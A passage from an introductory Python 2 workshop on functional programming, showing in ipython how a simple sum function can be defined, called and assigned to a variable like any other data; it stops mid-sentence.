#include <LEDA/basics/string.h> #include <LEDA/coding/compress.h> // contains all compression classes using namespace leda; typedef HuffmanCoder Coder; int main() { string str = "Hello World"; encoding_ofstream<Coder> out("foo"); out << str << "\n"; out.close(); if (out.fail()) std::cout << "error writing foo" << "\n"; decoding_ifstream<Coder> in("foo"); str.read_line(in); in.close(); if (in.fail()) std::cout << "error reading foo" << "\n"; std::cout << "decoded string: " << str << "\n"; return 0; }
In the example above we used the classes
encoding
and
decoding
with LEDA datatypes only.
We want to emphasize that they work together with user-defined types as well.
All operations and operators (« and ») defined for C++ streams
can be applied to them, too.
Assume that you want to send the file ``foo'' to a friend over the internet and
you want to make sure that its contents do not get corrupted. Then you can
easily add a checksum to your file. All you have to do is to replace the coder
in the typedef-statement by CoderPipe2<MD5SumCoder, HuffmanCoder>.
The class
CoderPipe2 combines the two LEDA coders
MD5SumCoder (the checksummer) and
HuffmanCoder into a
single coder.
If the pipe is used for encoding, then the
MD5SumCoder is used
first and the
HuffmanCoder is applied to its output. In decoding
mode the situation is reversed.
The standard behaviour of a checksummer like MD5SumCoder is as follows: In encoding mode it reads the input stream and computes a checksum; the output data basically consists of the input data with the checksum appended. In decoding mode the checksum is stripped from the input data and verified. If the input is corrupted the failure flag of the coder is set to signal this.
Suppose further that your friend has received the encoded file ``foo'' and wants to decode it but he does not know which combination of coders you have used for encoding. This is not a problem because LEDA provides a class called AutoDecoder which can be used to decode any stream that has been encoded by LEDA. The complete code for this extended example is depicted below:
#include <LEDA/basics/string.h> #include <LEDA/coding/compress.h> using namespace leda; typedef CoderPipe2<MD5SumCoder, HuffmanCoder> Coder; int main() { string str = "Hello World"; // your code ... encoding_ofstream<Coder> out("foo"); out << str << "\n"; out.close(); if (out.fail()) std::cout << "error writing foo" << "\n"; // your friend's code ... autodecoding_ifstream in("foo"); // autodecoding_ifstream = decoding_istream<AutoDecoder> str.read_line(in); in.finish(); // read till the end before closing (-> verify checksum) if (in.fail()) std::cout << "decoding error, foo corrupted" << "\n"; std::cout << "decoded string: " << str << "\n"; return 0; }
This example shows how easy it is to add compression to existing applications:
You include the header ``LEDA/coding/compress.h'', which makes all
classes in the compression module available.
Then you simply replace every occurrence of
ofstream by
encoding
<Coder > and
every occurence of
ifstream by
autodecoding
.
Of course, you can also use the LEDA coders in file mode. This means you can encode a file ``foo'' into a file ``bar'' and decode ``bar'' again. The example below shows how. We also demonstrate a nice feature of the AutoDecoder: If you query a description after the decoding the object tells you which combination has been used for encoding the input.
#include <LEDA/coding/compress.h> using namespace leda; typedef CoderPipe2<MD5SumCoder, HuffmanCoder> Coder; int main() { Coder coder("foo", "bar"); coder.encode(); if (coder.fail()) std::cout << "error encoding foo" << "\n"; AutoDecoder auto("bar", "foo"); auto.decode(); if (auto.fail()) std::cout << "error decoding bar" << "\n"; std::cout << "Decoding info: " << auto.get_description() << "\n"; return 0; }
More examples can be found in $LEDAROOT/test/compression. There we show in particular how the user can build a LEDA compliant coder which integrates seamlessly with the AutoDecoder.
Below we give a few suggestions about when to use which coder: | http://www.algorithmic-solutions.info/leda_manual/Lossless_Compression.html | crawl-002 | refinedweb | 696 | 57.47 |
sigstack - set and/or get alternate signal stack context (LEGACY)
#include <signal.h> int sigstack(struct sigstack *ss, struct sigstack *oss);
The sigstack() function allows the calling process to indicate signal stack overflows, the resulting behaviour is undefined. (See APPLICATION USAGE below.)
- The value of the ss_onstack member indicates whether the process wants the system to use an alternate signal stack when delivering signals.
- The value of the ss_sp member indicates the desired location of the alternate signal stack area in the process' address space.
- If the ss argument is a null pointer, the current alternate signal stack context is not changed.
If the oss argument is not a null pointer, it points to a sigstack structure in which the current alternate signal stack context is placed. The value stored in the ss_onstack member of oss will be non-zero if the process is currently executing on the alternate signal stack. If the oss argument is a null pointer, the current alternate signal stack context is not returned.
When a signal's action indicates its handler should execute on the alternate signal stack (specified by calling sigaction()), the implementation checks to see if the process is currently executing on that stack. If the process is not currently executing on the alternate signal stack, the system arranges a switch to the alternate signal stack for the duration of the signal handler's execution.
After a successful call to one of the exec functions, there are no alternate signal stacks in the new process image. direction of stack growth is not indicated in the historical definition of struct sigstack. The only way to portably establish a stack pointer is for the application to determine stack growth direction, or to allocate a block of storage and set the stack pointer to the middle.>. | http://pubs.opengroup.org/onlinepubs/7990989799/xsh/sigstack.html | CC-MAIN-2019-30 | refinedweb | 300 | 50.16 |
.
My try in REXX
[...] today’s Programming Praxis exercise, our goal is to write three fucntions: FizzBuzz, a function to [...]
My Haskell solution (see for a version with comments):
my implementation in c
Solution in Python (for simple tests look at github):
I have been trying to learn macros , so here is my code
using predicate dispatch paper, implemented using macros.
@Vikas Tandi – how about PrimeWords(“3″) and PrimeWords(“2″) :)
Oh and in my code instead of:
should be
My solution to “FizzBuzz”: write a generator “fizzer()” that accepts an argument list of the “fizz-buzz” parameters.
This is how you call it:
This is the output:
@arturasl – Thanks for pointing that out :(
This check should be added after decimal conversion
My Python solution, with multiple answers for each.
Some of it isn’t original, but I’m most proud of my list splitting and my use of Horner’s Method for
converting a word to a base 36 number (though Python’s
int()provides all the functionality we need,
anyway).
Here’s ruby versions of each. FizzBuzz is unimaginative, prime words is OK, split_list works for arrays, but I feel like it could be better.
@Graham – is_prime_word_horner will not work if you pass it word with digits:
Anyway neat solution, especially the usage of all() and reduce() q:-)
Here is an attempt in python
number = input(‘What number would you like to count to? ‘) + 1
whole = 0
fizzz = 0
buzzz = 0
def whole_number(num):
global whole
if num % 1 == 0:
whole = 1
else:
whole = 0
def fizz(num):
global fizzz
if num % 3 == 0:
fizzz = 1
else:
fizzz = 0
def buzz(num):
global buzzz
if num % 5 == 0:
buzzz = 1
else:
buzzz = 0
for N in range(1,number,1):
whole_number(N)
fizz(N)
buzz(N)
if fizzz is 1 and buzzz is 1:
print(‘FizzBuzz’)
elif buzzz is 1 and fizzz is 0:
print(‘Buzz’)
elif buzzz is 0 and fizzz is 1:
print(‘Fizz’)
else:
print(N)
Sorry I dont know how to retain the indentation and code look
Ryan Take a look at. That should explain how to format your code. I was going to paste it in, but I’m pretty sure it wouldn’t do what I want.
@arturasl: Thanks for catching that. I only thought to work with letters, basing my
ord(y) - 55
off of the offset for the letters A through Z…Like I said, the use of Python’s integer
conversion is probably the preferred method—in this case, the only correct method :-)
—that I came up with. Thanks again!
A non-destructive solution without using reverse (in case that’s cheating):
(define (split xs)
(let loop ((xs xs) (rest xs))
(if (or (null? rest) (null? (cdr rest)))
(values ‘() xs)
(let-values (((first second) (loop (cdr xs) (cddr rest))))
(values (cons (car xs) first) second)))))
Err, I’ll try formatted:
Here’s my 2 cents:
FizzBuzz
Thought I’d do something different than the standard if-elif-type answer.
Prime Words
isprime() is from a prior exercise
Split A List
Uses deques to efficiently add/pop items from either end.
Basic idea is add each item in the list to the end of the ‘back’ half. Every other time an item is added to the back, an item
is popped off the front of the ‘back’ half and added to the ‘front’ half.
Tested in MIT Scheme
praxis.scm
Here’s my Ruby solution:
I feel I cheated a bit with my solution for the 3rd assignment because I’m not scanning the list in situ. Oh well… =)
Simple Haskell for FizzBuzz.
run n = mapM_ putStrLn $ take n $ zipWith (\a b -> if null b then show a else b) [1..] $ zipWith (++) (cycle ["","","Fizz"]) (cycle ["","","","","Buzz"])
Scheme.
In a table, I store a continuation that builds a list made of 1/ what’s on the stack, and 2/ what you give it, as well as the current rest of the list. Each time I scan one more element of the list, I put it on the stack (with CONS) and call myself recursively, after setting the continuation and the rest of the list in the table. When the list is empty, compute the middle index, fetch the continuation and rest at this time, save the rest somewhere, and call the continuation with ‘() to return the list up to the middle. Then assemble everything and you’re done. Lists of length 0 and 1 are edge cases.
(define (split l)
(define table (make-table))
(define cnt 0)
(define bottom '())
(define (aux l)
(if (null? l)
(case cnt
((0 1) '())
(else
(let* ((mid (floor (/ cnt 2)))
(val (table-ref table mid)))
(set! bottom (cdr val))
((car val) '()))))
(begin
(set! cnt (+ cnt 1))
(cons (car l)
(call/cc
(lambda (build-top)
(table-set! table cnt (cons build-top (cdr l)))
(aux (cdr l))))))))
(let ((res (aux l)))
(vector res bottom)))
Morally the same as above, but cleaner. Uses a hack (?) from gambit (4.2.8 in my test), the fact that ((lambda(x) x) (values a b)) will effectively return the two values.
(define (split l)
(define (aux l #!optional (table (make-table)) (cnt 1))
(if (null? l)
(let* ((mid (floor (/ cnt 2)))
(val (table-ref table mid (cons (lambda (x) x) '()))))
((car val) (values '() (cdr val))))
(call-with-values
(lambda ()
(call/cc
(lambda (build-top)
(table-set! table cnt (cons build-top (cdr l)))
(aux (cdr l) table (+ 1 cnt)))))
(lambda (val bot)
(values (cons (car l) val) bot)))))
(aux l)) | http://programmingpraxis.com/2011/04/26/miscellanea/?like=1&source=post_flair&_wpnonce=20ee2ea151 | CC-MAIN-2014-42 | refinedweb | 918 | 75.64 |
THE SQL Server Blog Spot on the Web
The question in the title of this post is a popular one. There are many scenarios where it is desirable to navigate to the member of the Time hierarchy which corresponds to the current day, month or year. Sometimes there is a desire to set the default member to be aligned with the current date. It is especially relevant when the Time dimension contains a non-aggregatable attribute, such as Year (i.e. there is no member 'All Years'). By default, Analysis Services sets the default member to one of the years, but which one is undefined. So rather than override it with a static member such as [Time].[Year].[2005], one may want to point to the current year. Another common scenario is around the KPICurrentTime property, which is often set to today's day. Or, perhaps, calculations in the cube need to refer to today's date, etc.
Usually, when this question is asked, the typical answer involves calls to the VBA functions Now() or Date() combined with some clever formatting (which usually requires additional VBA functions such as Format, CStr, CDate, Month, Year, Quarter, Day, etc.) to build a string which looks like either a fully qualified or even a unique member name, and then feed it to the StrToMember MDX function. While these solutions do usually work, I am not fond of them. Building a unique member name manually goes against the spirit of MDX, since unique names are provider specific and have no specific format. But even building a fully qualified member name is dangerous, especially in solutions which freely use the ampersand sign (&) as a prefix for the member key - certainly undocumented behavior. Finally, I really dislike the StrToMember function for many reasons: for the havoc it wreaks in the query optimizer, for the unpredictable caching guarantees, for the very dynamic binding by means of reparsing its input.
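For illustration, the string-building pattern criticized here typically looks something like the following sketch. The &[yyyyMMdd] key format is an assumption made only for this example - the actual format depends entirely on how the particular Time dimension is keyed, which is exactly the fragility being argued against:

```
StrToMember("[Date_].[Calendar].[Date_].&["
    + VBA!Format(VBA!Now(), "yyyyMMdd") + "]")
```

Every piece of that string is cube-specific, and a change to the dimension key silently breaks the expression.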
The alternative that I propose is, instead of trying to build a member name in a specific format, to scan the members for a match with the current date. Let's demonstrate this with examples from Adventure Works. We will perform the following steps:
1. Obtain today's date using VBA!Date function
2. Since this article is written in 2007 and Adventure Works's Time dimension goes only as far as 2004, we will go 4 years back using DateAdd function, to get into year 2003.
3. Go over all the days and look for the one whose MemberValue is the same as today's (four years ago) date. In a properly designed Time dimension, the Date member's value will be of type DateTime.
4. There should be no more than one tuple in the result set if the Time dimension was properly designed, so take the first tuple of the set, which will be the desired member, or NULL if the result set came up empty.
The MDX expression which does it will look like the following:
Due to a bug in the blogging software, the literal Date in square brackets cannot be used in the blog post, therefore here and later I replaced it with [Date_] instead. If you try these examples, please change it back by removing the underscore.
Filter([Date_].[Calendar].[Date_], [Date_].[Calendar].MemberValue = vba!dateadd("yyyy", -4, vba!date())).Item(0)
Or, to use it in an MDX query to see the results:
select {} on 0
, Filter([Date_].[Calendar].[Date_], [Date_].[Calendar].MemberValue = vba!dateadd("yyyy", -4, vba!date())) on 1
from [Adventure Works]
There aren't many days in the Time dimension. Even if we kept 10 years in the cube, there would be no more than 3660 days. Running Filter over such a small number of members is instantaneous. However, we do note that for every single day we call the VBA function, which seems redundant, since the current date is a constant. Moreover, it is somewhat dangerous: if we were to run this query in the evening, at 11:59pm, the result of the VBA!Date function could change in the middle of execution! To prevent that, the query can be rewritten as
with member Measures.Today as vba!dateadd("yyyy", -4, vba!date())
select {} on 0
, Filter([Date_].[Calendar].[Date_], [Date_].[Calendar].MemberValue = ([Date_].[Calendar].[All Periods],Today)) on 1
from [Adventure Works]
This is quite a common trick - shift the coordinate to a constant member (i.e. All Periods) in order to make Filter request the same coordinate - ([Date_].[Calendar].[All Periods],Today) - for every iteration. This way the hope is that it will be computed only the first time, and cached afterwards. An even better way to do it is to write
with member Measures.Today as vba!dateadd("yyyy", -4, vba!date())
select {} on 0
, Filter([Date_].[Calendar].[Date_], [Date_].[Calendar].MemberValue = Root(Today)) on 1
from [Adventure Works]
Here, by using Root(Today) we shift coordinates in all dimensions and attributes to the constant, so even if we had more axes in the query, or other coordinate shifting calculations, they won't matter, and VBA!Date would be called only once.
Similar trick can be done also inside MDX Script. It relies on the fact that named sets are static and computed only once. Therefore, the MDX Script could contain the following line:
CREATE HIDDEN TodayDate = vba!dateadd("yyyy", -4, vba);
CREATE SET Today AS Filter([Date_].[Calendar].[Date_], [Date_].[Calendar].MemberValue = ([Date_].[Calendar].[All Periods],TodayDate));
And afterwards, whenever we need to reference today's date - we would use Today.Item(0), or even shorter notation of Today(0).
The catch here is that evaluated MDX Script is cached, so unless there is some sort of refresh to the cube, the named set Today won't change from day to day and will become outdated. But as long as new data is loaded into cube daily - it will be OK, since any kind of processing will trigger reevaluation of MDX Script.
Yet another solution for the scenarios where application cannot depend on the specific MDX Script, is to use stored procedures. While it won't be as performant as previous one, it could be more universal.
Below is the code of stored procedures which returns today's day:
public Member GetToday(Level lvl)
{
// Get today's date from the system
System.DateTime today = System.DateTime.Today;
System.DateTime fouryearsago = today.AddYears(-4);
// The only way to get set out of the level. Direct cast won't work
Expression lvlexp = new Expression(lvl.UniqueName);
Set lvlset = (Set)lvlexp.CalculateMdxObject(null);
// Build the string in the form
// [Date_].[Calendar].[Date_].MemberValue = CDate("5/21/2007")
Expression exp = new Expression(
lvl.ParentHierarchy.UniqueName
+ ".MemberValue = CDate(\""
+ fouryearsago.GetDateTimeFormats('d')[0]
+ "\")");
Set filterset = MDX.Filter(lvlset, exp);
// Iterate only one step - this is better then checking
// the count and indexing the 0's item
foreach (Tuple t in filterset.Tuples)
return t.Members[0];
// If today's date wasn't found - return NULL member
// Since Member object doesn't have ctor - this is the only way
Expression nullmbr = new Expression("NULL");
return (Member)nullmbr.CalculateMdxObject(null);
}
Due to several limitations of AdomdServer object model, there is an excessive use of Expression object in the code above. It could've been much simpler if the Member object exposed MemberValue property, because then none of the dynamically built expressions would've been needed, and CDate wouldn't have to be evaluated over and over again. Simple loop over lvl.GetMembers() comparing value of today variable with Member.MemberValue would've done the job. Alas, not in current version. The typical call to such sproc would look like
select {} on 0
,ASSP.ASStoredProcs.Util.GetToday([Date_].[Calendar].[Date_]) on 1
from [Adventure Works]
The sproc requires passing the level as its argument, but this can be improved too. The version below finds the Day level in the cube automatically:
public Member GetToday()
{
CubeDef cb = Context.CurrentCube;
Dimension timedim = null;
foreach (Dimension dim in cb.Dimensions)
{
if (dim.DimensionType == DimensionTypeEnum.Time)
{
timedim = dim;
break;
}
}
if (null == timedim)
throw new System.ArgumentException("No Time dimension in the cube");
foreach (Hierarchy h in timedim.Hierarchies)
{
foreach (Level lvl in h.Levels)
{
if (lvl.LevelType == LevelTypeEnum.TimeDays)
return GetToday(lvl);
}
}
throw new System.ArgumentException("No Day level in the Time dimension");
}
This sproc will work with the simpler call, like this one
select {} on 0,ASSP.ASStoredProcs.Util.GetToday() on 1from [Adventure Works]
However, in cube like Adventure Works which have multiple Time dimensions, sproc will return member from the random one. Also, it turns out that there is a slight mismatch between AMO attribute types and ADOMD.NET level types, so marking Date attribute with type 'Date' in AMO will translate into type 'Regular' in ADOMD.NET. (And Adventure Works cube has a small bug, the level that gets marked with Day type is the 'Day Name' which really should be marked as DayOfWeek type).
So we saw several different methods of determining the current date through MDX. But none of them is ideal. They all rely on the non-deterministic VBA functions such as Now and Date, which can have really bad caching implications. So the best solution, which is also the simplest one in terms of MDX, is to have a dedicated process, which will update MDX Script daily with the following line:
CREATE SET Today AS { [Date_].[Calendar].[Date_].[May 21, 2003] };
Where the name of today's date is hardcoded and changed every day. This will have the best performance, but it will also add a little management burden on the cube maintainer. | http://sqlblog.com/blogs/mosha/archive/2007/05/23/how-to-get-the-today-s-date-in-mdx.aspx | CC-MAIN-2014-15 | refinedweb | 1,577 | 56.55 |
secretutils.constant_time_compare raise a exception
Bug Description
see follow code:
```python
import hmac
from oslo_utils import secretutils
first = hmac.new(
second = hmac.new(
print secretutils.
```
HMAC digest value is binary data('str' type in python2.x), not an ascii sequence,
so when using `constant_
exception in position `first.
Exception message like this:
UnicodeDeco
I test it in centos 7.1.
Reviewed: https:/
Committed: https:/
Submitter: Zuul
Branch: master
commit e158c10ccb80963
Author: changxun <email address hidden>
Date: Wed May 23 17:13:47 2018 +0800
Fix exception with secretutils
1. There are some problems about the test method.
problem 1:
Unit tests may not cover our function, it depends on the python version
that performed the test.
problem 2:
when using function 'constant_
'second' params are usually HMAC digest values, it is not appropriate to
use utf-8 encoded values as mock data.
2. The previous commit `f1d332a` lead into a bug, but due to the problem 1
and the problem 2, we did not find out the error.
Change-Id: I1c29bfe69f8eda
Closes-Bug: #1772851
This issue was fixed in the openstack/
Fix proposed to branch: master
/review. openstack. org/570151
Review: https:/ | https://bugs.launchpad.net/oslo.utils/+bug/1772851 | CC-MAIN-2019-18 | refinedweb | 192 | 57.47 |
Tips for using Dynamic Link Libraries (DLLs) with MFC
But to do this work properly there are some tips that must be followed. Many of you might be asking asking Why not simply use COM ? The answer is that, of course, COM is a great choice in certain situations. However, DLLs are still a very viable alternative as well. Therefore, in this article. I hope to illustrate just when you should use DLLs and exactly how to use them within the framework of an MFC application.
A big problem of DLLs (specially those that use MFC) are the debug and release version. These versions are incompatible. You probably had the problem of running the debug application version with the DLL release version. The whole world gets crazy!! The best way, in fact the way Microsoft does, is to give diferent names to the DLLs. So the release DLL stays with the Visual C++ project name and the debug version would look like [Project Name]D.DLL. Using this approach you can send the two DLLs to the system directory and be happy. Those are the steps needed to achieve this (suposing the project name is AAA):
- Copy the AAA.def to AAAD.def and change all the AAA to AAAD;
- In the Project/Settings, select Win32 Debug
- Under the tab Link change the Output file name to AAAD.DLL;
- Below in this property page you can see something like:
/def:".\AAA.def" /out:"Debug/AAAD.DLL"
Change to:
/def:".\AAAD.def" /out:"Debug/AAAD.DLL"
Now the the debug version will create AAAD.lib and AAAD.DLL files. When I create a DLL I create an include header to it (I think everybody does), which I named DLL header. This header has all the exported classes definitions. And to be more efficient I include the linking stuff in it, so to use the DLL you doesnt have to add the lib file to the Project Settings. My header looks like:
#ifndef DEF_MUDASDASDASDASDAS #define DEF_MUDASDASDASDASDAS #ifdef _DEBUG #pragma comment(lib, AAAD.lib) #else #pragma comment(lib, AAA.lib) #endif //... the classes definitions goes here #endif //MUDASDASDASDASDAS
Programming for Changes
The prefered kind of DLL used to export classes are the MFC extension DLLs. By using this you can easily instanciate a classe that is within a DLL. To do this you just declare the class like this:
class AFX_EXT_CLASS CFoo { //... }
In the application that uses this class you just include the DLL header and everything is cool. The problem is: everytime you need to include a member variable or a method to an exported class you have to change the DLL header, which means recompile all those who use the DLL. To new methods I dont know a way to overcome this recompilation, but for new variables theres a way.
Instead of declaring the member variables directly to the class body, you create a kind of implementation class, like the sample code:
class CFooImpl; class CFoo { protected: CFooImpl* m_pThis; };
So the CFooImpl class doesnt need to be declare to those how use this DLL. The implementation of CFoo would look like:
class CFooImpl { public: CString m_sName; }; CFoo::CFoo() { m_pThis = new CFooImpl; m_pThis->m_sName = _T("Unknown"); } CFoo::~CFoo() { delete m_pThis; }
Another method to be prepared for changes is to use inteligents structs the way the Windows API does. So you declare a method that has an LPVOID as in and out parameter. Those pointers are address of structs instances. The trick is to define as the first struct member a DWORD regardings its size. This way you know which data is expected.
typedef struct tagCHANGEABLE { DWORD dwSize; long lBytes; }CHANGEABLE, *LPCHANGEABLE; BOOL CFoo::Method(LPVOID lpIn) { LPCHANGEABLE lpChangeable = (LPCHANGEABLE)lpIn; if (lpChangeable->dwSize == sizeof(CHANGEABLE)) { //... return TRUE; } return FALSE; }
Using it:
CFoo myFoo; CHANGEABLE changeable; memset(&changeable, 0, sizeof(changeable)); changeable.dwSize = sizeof(changeable); myFoo.Method(&changeable);
DLL Loaded When Needed
Sometimes you have uncommon situations that you need to call a dialog or create a class instance. So you decide to put those in a DLL, but you dont want it to be loaded when the application gets executed. You want to load the DLL when needed (COM). This kind of DLL I call Dynamic DLL (stupid name I know Dynamic Dynamic link libraries). So you declare the exported function as:
__declspec( DLLexport ) void MyExportedFunc(DWORD dw) { //... }
We need to include this function in the defs files (debug and release). The debug def file would look like this:
; AAAD.def : Declares the module parameters for the DLL. LIBRARY "AAAD" DESCRIPTION 'AAAD Windows Dynamic Link Library' EXPORTS MyExportedFunc @1 ; Explicit exports can go here
Now to use this function we need to load the library, find the function entry point and call it.
typedef void (*MYFUNC)(DWORD); #ifdef _DEBUG HINSTANCE hDLL = AfxLoadLibrary("AAADLLD"); #else HINSTANCE hDLL = AfxLoadLibrary("AAADLL"); #endif if (hDLL) { FARPROC pnProc = GetProcAddress(hDLL, "MyExportedFunc"); MYFUNC pnMyfunc = (MYFUNC)pnProc; pnMyfunc(0); FreeLibrary(hDLL); }
Remember that to use show a dialog you must take care of the resource stuffs (AfxSetResource..). You can use this approach to create class instances. The class definition must use pure virtual functions (to avoid unresolved external symbol). It is just like COM.
The class definition should look like this:
class CFoo { public: virtual void Initialize (CString sName) = 0; };
You implement this "interface" with another class that is not visible through the DLL header file.
class CFooImp : public CFoo { public: CFooImp(); virtual ~CFooImp(); void Initialize (CString sName) { m_sName = sName; } protected: CString m_sName; };
To create an instance of this class (interface) you create an exported function.
__declspec(DLLexport) CFoo* CreateFoo(DWORD dwVersion) { if (dwVersion == CURRENT_VERSION) return new CFooImp; return NULL; }
The application creates the class instance like this:
typedef CFoo* (*MYFUNC)(DWORD); #ifdef _DEBUG HINSTANCE hDLL = AfxLoadLibrary("AAADLLD"); #else HINSTANCE hDLL = AfxLoadLibrary("AAADLL"); #endif if (hDLL) { FARPROC pnProc = GetProcAddress(hDLL, " CreateFoo"); MYFUNC pnMyfunc = (MYFUNC)pnProc; CFoo* pFoo = pnMyfunc(0); pFoo->Initialize(_T("Hi")); delete pFoo; FreeLibrary(hDLL); }
Remember that you cannot free the library until you deleted the CFoo instance.
Conclusion
These examples explained the powers of well designed DLLs. But if the whole project has a bad design no miracle will make your applications easy to change and update. The good design is the first and most important step to the successfull project.
Additional Christian Louboutin added juin paire de FRED Teem Hommes automne / hiver 2012 AU 14 nouveau printed poney mocassin JordanPosted by Vetriatszy on 03/15/2013 01:18pm
amazing choice to achieve Abercrombie revenue even although abercormbie have an overabundance than 1,000 outlets globally,employing up to date misery of the universe industrial state's borders,some expansion display had to be postponed and additionally interim the division terior chain as Ruehl ended up being closed on account of the high cost for going. we are all aware, Abercrombie fasion clients are mainly based on the stores in enormous county, this also often causes large click over here onto rent,Labours with the help of getting the whole sequence, clients abercrombie highlighted however the dog's entire process affordability revenue way those quite a few years, folks selpublishmly commissions or alternatively any kind of low named sustaining trademark enjoy. and also we needed to say that the majority of abercrombie which has made favourable discuss its model to trap ones prefer of teenager and quality of its solution, truthfully to most of individuals, Abercormbie is an inexpensive luxury, individuals could possibly be a more happy, whenever "Abercormbie available for sale" properly developed more frequently. the fabric among abercormbie T-t-shirts the best idea home owner in all of the special type abrcrombie associated with technique is mainly according to 100% cotton, genuine no big-techie artifical style focused, We can observe with out darkness of anxiety that the content expense of a bit of polos is not really before two united states dollar dollars, much to find cotton of the world. in the western world labours, Because lots of the clothing is came down with mamufactured from inside the under-developed gets,Which aren't composing cost for gettingReply
Impart Jordan V Repulsive Awaken Red Mephistophelian qui sortira officiellement le 26 janvier 2013 JordanPosted by Vetriatszy on 03/14/2013 01:38pm
Petersburg's First evening time factors american idol Finalist emmanuel Lynche mirielle Lynche, st. Petersburg, Fla. ancient to Season 9 american idol Finalist, head lines usually the annual upcoming summers eve activities within the local towards Dec. 31, 2010. Lynche has become booked to accomplish on the principal step at northern Straub park your car prior the First Night thousand finish fireworks at nighttime. just for 18 lots of, st. Pete seems to have written involving Florida's most First day merrymaking events. the foregoing spouse-user friendly, booze-Free extravaganza blends a nice of varied entertainments, like hands-by martial arts styles and after that projects, food shopping cart march, exercise involved with preference operatic arias, Puppet live theatre along with favorite bubble stomp. competitions become scheduled along at the boat dock, public in brilliant martial arts styles, Baywalk, straub park system coupled with other general. Petersburg wedding venues as well as includes tampa Bay's maximum fireworks this website arrangement. expect guidance on events in your area? catch e-mailings status updates in the event that absolutely new content is shared by way of clicking on the 'Subscribe' key around. go to this page to speak to your polk bay holidays ExaminerReply | http://www.codeguru.com/cpp/w-p/dll/article.php/c95/Tips-for-using-Dynamic-Link-Libraries-DLLs-with-MFC.htm | CC-MAIN-2015-18 | refinedweb | 1,573 | 51.07 |
i have a string that i want to convert to double. i know atof is a standard library function for that, however, the input argument to atof is (const char*), not string type that i have.
does anyone know how i might convert my string num to double ? thanks
string num = "45.00"; double x = atof(num);
You can use istringstream
std::istringstream stm; stm.str("3.14159265"); double d; stm >>d;
If you are sure that the string is in double conversible format like 1.2e-2, grunt's method is the eaisest. But if you want to check the input string if it can be converted as double, e.g 123abc will be converted as 123 in grunt's method. For easier error checking better use strtod. Just checking the value of end to be null will be enough.
#include <sstream> #include <cstdlib> int main () { std::istringstream stm; char* end = 0 ; double d; stm.str("123abc");// Invalid input string stm >>d; std::cout << d << std::endl; // Returns 123 stm.str("123e-2"); stm >>d; std::cout << d << std::endl; d = strtod( "123abc", &end ); // Invalid input string if ( *end == 0 ) std::cout << d << std::endl; else std::cout << "Error Converting\n"; // Reports error d = strtod( "123e-2", &end ); if ( *end == 0 ) std::cout << d << std::endl; else std::cout << "Error Converting\n"; return 0; }
PS:
To get the characters from
num , use
num.c_str()
thank you all. for the time being my strings are all convertible to double. but i might need wolfpack's suggestion just to be safe
If you want error checking then I would suggest you to use Exception Handling. That will be a better option.
Which brings us to this: | http://www.daniweb.com/software-development/cpp/threads/54367/string-to-double | CC-MAIN-2014-15 | refinedweb | 285 | 83.36 |
Anything related to i18n/i10n subject seem to be somehow quirkier than it looks at first glance. Python (2.x) itself and handling of unicode is a story apart.
This time I was looking into building a small website that has to provide UI in different languages. As this is one of the things you want to have right away I’ve started experimenting with adding i18n and i10n support.
First step is easy, the
settings.py already had proper settings. Then for .py files it is rather straightforward to add e.g. (for forms):
from django.utils.translation import ugettext_lazy as _
...
city_name = forms.CharField( required = False, label = _('City:'))
For the .html files something like
{% load i18n %}
{% trans "Hello there!" %}
Then create under project folder folder ‘conf/locale’ (if you don’t do this it will complain), and then run
django-admin.py makemessages -l ru
Edit the resulting django.po file, add translations to your messages.
Warning: don’t forget to edit the following field, which comes EMPTY first, even while you have given it a parameter! Otherwise this file will be not used properly.
"Language: ru\n"
Then compile your nice and shiny translations:
django-admin.py compilemessages
Now we get all messages available. At least they should. But there is another trick missed in the Django documentation/tutorials: you HAVE TO specify the location of the message files explicitly in your
settings.py otherwise your texts will continue coming up in default (en) language no matter how hard you try. E.g.:
LOCALE_PATHS = (
os.path.join(os.path.dirname(__file__), 'conf', 'locale').replace('\\','/'),
)
Well, after all this it seems to work. But it costs quite some searching and poking around to come to this. I can imagine after several rounds this becomes obvious, but you don’t get any errors, warnings, whatsoever, it just does not what you want it to do. Well, I hope it will do it for you now :).
Happy Djangoing! | http://blog.bidiuk.com/2013/04/setting-up-dango-i18n-i10n/ | CC-MAIN-2021-31 | refinedweb | 329 | 68.26 |
O(m+n) time, O(1) space but need to temporarily modify the structure.
a1 ->->-> c1 ->->-> c3 ↑ | b1 ->->
Method description:
- Find the length of (a1->c3), countA, and get the tail
- Find the length of (b1->c3), countB, get the tail c3, and reverse
the whole (b1->c3) link to (c3->b1)
- Find the length of (a1->b1), countX
- Reverse (c3->b1) back to (b1->c3)
- If the first two tails are not equal, return None
- Proceed from a1 by (countA - (countA+countB-countX+1)/2) nodes, and
return that
It tries to count the length of the branches.
436ms in Python which is among the top 3%
class Solution: # Count the nodes and return the tail and the length # return (tail, len) def countNodes(self, head): count = 1 while head.next is not None: count += 1 head = head.next return (head, count) # Count the nodes, reverse the whole link, and return the original tail and the length # return (tail, len) def reverseNodes(self, head): count = 1 prev = head now = prev.next prev.next = None while now is not None: count += 1 temp = now.next now.next = prev prev = now now = temp return (prev, count) # @param two ListNodes # @return the intersected ListNode def getIntersectionNode(self, headA, headB): if headA is None or headB is None: return None tailA, countA = self.countNodes(headA) tailB, countB = self.reverseNodes(headB) _, countX = self.countNodes(headA) self.reverseNodes(tailB) if tailA is not tailB: return None for _ in range(countA - (countA+countB-countX+1)/2): headA = headA.next return headA | https://discuss.leetcode.com/topic/21685/a-new-method-different-from-any-of-the-solution-provided | CC-MAIN-2017-47 | refinedweb | 257 | 68.1 |
Part 1: Functions as Objects
First, lets start Python. For Part 1, we will do everything using ipython, which provides a nice interactive python shell. We start ipython using the command
ipython
(note that you must be using Python 2 for this workshop and not using Python 3. Complete this workshop using Python 2, then read about the small changes if you are interested in using Python 3)
Functional programming is based on treating a function in the same way as you would a variable or object. So, to start, we should first create a function. This will be a simple function that just adds together two numbers. Please type in ipython
def sum(x,y): """Simple function returns the sum of the arguments""" return x+y
This is a very simple function that just returns the sum of its two arguments. Call the function using, e.g.
result = sum(3,7) print(result)
which should print out
10.
In functional programming, a function is treated in exactly the same way as a variable or an object. This means that a function can be assigned to a variable, e.g. type
a = sum result = a(3,7) print(result)
This should print
10 again. Here, we have assigned the function
sum
to the variable
a. So how does this work?
For variables, you should be comfortable with the idea that a variable is a container for a piece of data. For example,
b = 10
would create a piece of data (the integer
10) and will place it into
the container (the variable
b). When we type
a = b
we are copying the data from
b and placing it into the variable
a.
Now both
a and
b contain (or point to) the same data.
For functional programming, the code of a function is also treated like a piece of data. The code
